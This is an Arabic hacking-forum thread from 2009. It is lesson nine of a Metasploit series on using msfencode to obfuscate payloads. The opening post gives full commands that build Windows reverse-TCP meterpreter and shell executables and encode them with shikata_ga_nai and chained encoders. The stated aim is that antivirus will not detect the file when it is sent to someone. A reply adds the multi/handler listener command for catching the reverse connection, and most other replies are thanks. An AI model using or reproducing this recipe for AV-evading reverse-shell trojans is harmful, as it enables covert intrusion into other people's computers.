التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. قـسم الأختراق المتقدم .:: Advanced Hacking Section .:: ] > MetaSploit

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 12-03-2009, 11:04 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
المجهووول
Mr.AlmjH00l SnaK3sPc T34M
 
الصورة الرمزية المجهووول
 

 

 
إحصائية العضو





المجهووول غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
المجهووول is on a distinguished road

افتراضي الدرس التاسع : تشفير البايلود بالميتاسبلويت msfencode


بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاتة
كيف صحتكم واوالكم وظروفك
ان شاء الله رب العالمين تكونو بألف خير وصحة وسلامة وعافية
اليوم درسنا يتكلم عن التشفير بالميتاسبلويت
لنفرض انك انشأت بايلود بالـ msfpayload وفحصته او ارسلته لأحد اظن انه رح ينكشف من برنامج الحماية
لكن درسنا اليوم رح يتم تشفير البايلود نهائي من اي حمايات
نبدأ اول شيء
نذهب لل CMD SHELL

نكتب امر

كود PHP:
ruby msfencode -
اظهار تعليمات حول الادرة
كود PHP:
ruby msfencode -
يظهر انواع التشفيرات المتوفرة وقوت كل واحد
واقوى واحدة وهي شيكاتا
كود PHP:
x86/shikata_ga_nai 
الآن نأتي لتعريف الاوامر لها والمهمة والرئيسية
-e نوع التشفير يتبعها الاسم كـ
كود PHP:
-e x86/shikata_ga_nai 
-t صيغة التشفير يتبعها الصيغة
والمتوافرة في الاداة هي 6 وهي
raw, ruby, perl, c,exe, vba
يكون الامر كـ
كود PHP:
 -t perl 
-i لأستيراد بايلود صنعتة سابقا وتريد تشفيرة الآن
يكون الامر هكذا
كود PHP:
-i C:\server.exe 
او باللينكس يكون الامر متبوع بالاسم مباشرة هكذا
كود PHP:
-i server.exe 
او حسب المسار باللينكس
الان عند التشفير يجب وضع -o لأخراج الملف للخارج اذا لم تريد ان يطبعه على شكل كود برمجي وفي وندوز سواء وضعته ام لا لن يفعل شيء
لانك بآخر الكود رح تضع
كود PHP:
 >"C:\"service.exe 
ويفضل وضعه

لم نتطرق الى جميع الاوامر لكن في المستقبل القريب
في الوقت هذه اللي تهمنا فقط ... باقي 5 اوامر غير مهمة كثيرا
الآن نأتي للعملي
نعرف في العادة ان صناعة اي بايلود يكون هكذا
كود PHP:
ruby msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.1 LPORT=4444 X >"C:\"server.exe 
الآن هذا الامر واضح يقوم بصناعة بايلود لكن اذا ذهب وفحصته بأي موقع فحص او حماية جهازك ترى انه مكشوف
الآن هو في المسار C:\
الآن لنقم بتشفيره بالأمر
كود PHP:
ruby msfencode -e x86/shikata_ga_nai -i C:\server.exe -t exe ->"C:\"encoded.exe 
لنوضح الاوامر بدقة
كود PHP:
ruby msfencode 
لأستخدام الاداة (التشفير)
كود PHP:
-e x86/shikata_ga_nai 
وكما ذكرت لأستخدام النوع الذي تريد التشفير به اونا اخترت شيكاتا وهو اقوى واحد مشفر من جميع الحمايات عدى اثنين او ثلاثة وهي AVG و avast والثالث لم اذكر اسمه
كود PHP:
-i C:\server.exe 
وايضا كما ذكرت لتشفير ملف تم انشائه سابقا متبوعا بالمسار واذا كان بداخل المجلد كما في اللنكس نضع فقط الاسم
كود PHP:
-t exe 
وايضا كما ذكرت سابقا لأختيار الصيغة وهنا صيغة exe ملف تنفيذي
كود PHP:
-
لاخراجة للخارج وعدم طباعته على الشاشة

لنفرض انك تريد الشل بلغة بيرل او سي اي مطبوع على شاشة الدوس
كود PHP:
ruby msfencode -i C:\server.exe -t c test.exe 
وسترى انه طبعه على شاشة الدوس بتشفير شيكاتا
ييجي واحد ويقول ليش ما اخترنا نوع التشفير
اقوله لأن الاداة تختار التشفير شيكاتا تلقائي
الآن نقدر نسوي كل هذا من صنع بايلود وتشفيره على سطر واحد ونسمي الملف بالأخر
انظروا كيف..
كود PHP:
ruby msfpayload windows/shell/reverse_tcp LHOST=192.168.1.137 LPORT=4444 X ruby msfencode -e x86/shikata_ga_nai -t exe >"C:\"finish.exe 
اول امر وهو صناعة بايلود لكن دون وضع اسم ومكان الحفظ فقط وضعنا الصيغة exe اختصار لـ X وفصلناه مع الأمر الآخر برمز | ثم كتبنا الامر التالي وهو واضح اختيار التشفير شيكاتا والصيغة ومكان الحفظ

ويوجد ايضا التشفير بأكثر من نوع
كود PHP:
ruby msfpayload windows/shell/reverse_tcp LHOST=192.168.1.15 LPORT=4444 ruby msfencode -e x86/shikata_ga_nai -t raw -c 5 ruby msfencode -e cmd/generic_sh -t raw -c 5 ruby msfencode -e x86/countdown -t perl >"C:\"3encoders.exe 
كل شيء واضح عدا -t raw -c 5 اي انه يجمع الصيغة وبالىخر يتم اختيارها
الآن افحص الملف وستجده انه غير مكشوف من اي حماية
هذا هو درسنا
وان شاء الله استفدتوا
واللي مو فاهم يقول لي وانا بالخدمة
ولشباب اللينكس فقط التغييرات بسيطة مجرد من ruby الى ./ و المسار C الى اسم فقط او مسار تفضله وبأمكانك وضع اسم الملف فقط وستجده داخل مجلد اداة الميتاسبلويت
مع تحياتي
لا للاحتكار
المجهوول


hg]vs hgjhsu : jatdv hgfhdg,] fhgldjhsfg,dj msfencode


التعديل الأخير تم بواسطة المجهووول ; 12-06-2009 الساعة 10:58 PM.

   

رد مع اقتباس
قديم 12-03-2009, 11:50 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
إحصائية العضو






ThE BiGeSt JoKeR غير متواجد حالياً

إرسال رسالة عبر Skype إلى ThE BiGeSt JoKeR

 

 

إحصائية الترشيح

عدد النقاط : 10
ThE BiGeSt JoKeR is on a distinguished road

افتراضي


مشكووور اخي المجهووووووول

راائعه منك في اخترااق الاجهزه ...

اظنك نسيت امر التنصت للاتصال العكسي ..

تسلم على الدرس الراائع .. كنا بنتظاره

ملحووظه :
"""""""""""""""""""""""""""""""""""""""""""""

طبعاً الشرح على الاصدار رقم 3.2
نزل الاصدار رقم 3.3 ... و لسوءه و عدم كفائته نزل الاصدار رقم 3.3.1 و تم حل الاخطاء التي كانت عليه

يختلف الشرح ففي الاصدار رقم 3.2 كان اسم الاداه هو CMD shell
في الاصدار الجديد تغير المسمى الى cygwin shell
و تغير ايضاً الشكل الخارجي كاملاً للاداه ..
بالنسبه لكتبه الاوامر .. اكتبو الاوامر كما كنتم تكتبوها من قبل في الاصدار الماضي

:::::::::::::::::::::::::::::::::::::::::::

ملاحظه : تم اضافه امر التنصت (( ليتم التبليغ )) بعد امر صناعه البايلود
^.^

يتم اظافه امر التنصت بعد امر صناعه البايلود و يكون الامر هكذا :

كود PHP:
ruby msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=9999 E 
يكون الامر بعد امر صناعه البايلود
التوضيح :
LHOST=192.168.1.1 \ غير الاي بي الذي في الامر الى الاي بي الذي ادخلته في متطلبات البايلود
-----------------
LPORT=9999 \ غيير البورت الى البورت الذي ادخلته في متطلبات البايلود ^_^

هذا الامر يكن بعد امر صناعه البايلود مباشره و من ثم بعده يكوون امر التشفيير

اذا في شيء مو واضح ... نحن في الخدمه ^_*
التوقيع

انتبه ...
جيوش الـ Metasploit ستزور العناكب



نحن قوم لا نحب الغرور .. لكن الزمن سمح لنا بالتباهي .. لأننا ملوك


[/COLOR]

on vbspiders only

 


التعديل الأخير تم بواسطة ThE BiGeSt JoKeR ; 12-04-2009 الساعة 05:20 PM.

   

رد مع اقتباس
قديم 12-04-2009, 01:26 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية axel
 

 

 
إحصائية العضو







axel غير متواجد حالياً

إرسال رسالة عبر MSN إلى axel

 

 

إحصائية الترشيح

عدد النقاط : 10
axel is on a distinguished road

افتراضي


مشكوووور ياغالي على الدرس المفيد

تحياتي لك

   

رد مع اقتباس
قديم 12-04-2009, 03:37 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي


مشكور يا مبدع

ما شاء الله عليك

تسلم يا غالي على الدرس الرائع

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
قديم 12-04-2009, 03:28 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
إحصائية العضو






الشبح المرح غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
الشبح المرح is on a distinguished road

افتراضي


بارك الله فيك على الشرح الرائع

تسلم و الباقي كملو الاخ جوكر

التوقيع







 

   

رد مع اقتباس
قديم 12-06-2009, 11:25 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
المجهووول
Mr.AlmjH00l SnaK3sPc T34M
 
الصورة الرمزية المجهووول
 

 

 
إحصائية العضو





المجهووول غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
المجهووول is on a distinguished road

افتراضي


يسلمو شباب
واظن التصنت الاغلب او الكل يعرفه من الميتاسبلويت لاننا تدرجنا له
بارك الله فيك يا غالي ما قصرت
تحياتي
لا للاحتكار
المجهوول

   

رد مع اقتباس
قديم 12-12-2009, 08:43 AM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية black_pearl
 

 

 
إحصائية العضو





black_pearl غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
black_pearl is on a distinguished road

افتراضي


السلام عليكم اوا مشكور اخى ثانيا البايلود بعطل لما بشفرو ممكن اعرف اية السبب ان البايلود يعطل بعد التشفير لايصل ون جد جربو واتصل معاة بعد التشفير ياريت يرد عليا وشكرا

   

رد مع اقتباس
قديم 02-07-2010, 06:45 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية v.i.r.u.s
 

 

 
إحصائية العضو





v.i.r.u.s غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
v.i.r.u.s is on a distinguished road

افتراضي


شكـــــــــــــــــــــــــــــــــــــــــــ بارك الله فيك ــــــــــــــــــــــــــــــــــــــــــــــــــ ـــــــــــــــرا

   

رد مع اقتباس
قديم 02-22-2010, 04:31 PM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية toxine
 

 

 
إحصائية العضو





toxine غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
toxine is on a distinguished road

افتراضي


السلام عليكم ورحمة الله وبركاته thanx شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

   

رد مع اقتباس
قديم 03-25-2010, 09:44 PM   رقم المشاركة : 10 (permalink)
معلومات العضو
D-GhosT s3cur!Ty-Z
::. Moderators .::
 
الصورة الرمزية D-GhosT s3cur!Ty-Z
 

 

 
إحصائية العضو







D-GhosT s3cur!Ty-Z غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
D-GhosT s3cur!Ty-Z is on a distinguished road

افتراضي


شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية . شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

التوقيع

Palastine 4ever



يرجى من الاخوة الكرام الاطلاع على قوانين الشبكة
لكي تكون لك مشاركة رائعة مع الشبكة


http://www.vbspiders.com/vb/t71973.html

 

   

رد مع اقتباس
قديم 09-26-2010, 01:29 PM   رقم المشاركة : 11 (permalink)
معلومات العضو
 
إحصائية العضو







Abood Noiseless غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Abood Noiseless is on a distinguished road

افتراضي


تسلم ايدكم يا شباب و جوكر قالها -- ههههههههههههههههه ----------- يلي بيس

   

رد مع اقتباس
قديم 11-26-2010, 08:06 PM   رقم المشاركة : 12 (permalink)
معلومات العضو
 
الصورة الرمزية ouTLaw
 

 

 
إحصائية العضو






ouTLaw غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ouTLaw is on a distinguished road

افتراضي


بارك الله فيك

التوقيع

[align=center]وَتِلْكَ حُدُودُ اللَّهِ وَمَنْ يَتَعَدَّ حُدُودَ اللَّهِ فَقَدْ ظَلَمَ نَفْسَهُ [/align]

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
[الدرس الرابع]البايلود ووظيفة كل واحدة منها المجهووول MetaSploit 19 04-10-2011 11:56 AM
الدرس التاسع:شرح دمج السيرفر مع برنامج بدون برمج tobo قســم إختــراق الأجهــزة 1 08-27-2010 12:12 AM
الدرس التاسع عشر(التعامل مع الملفات والمجلدات) SoLiTair4Ever برمجة الويب 0 07-19-2009 11:40 PM
الدرس التاسع(التعامل مع العميل) SoLiTair4Ever برمجة الويب 0 07-19-2009 10:51 PM


الساعة الآن 05:07 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0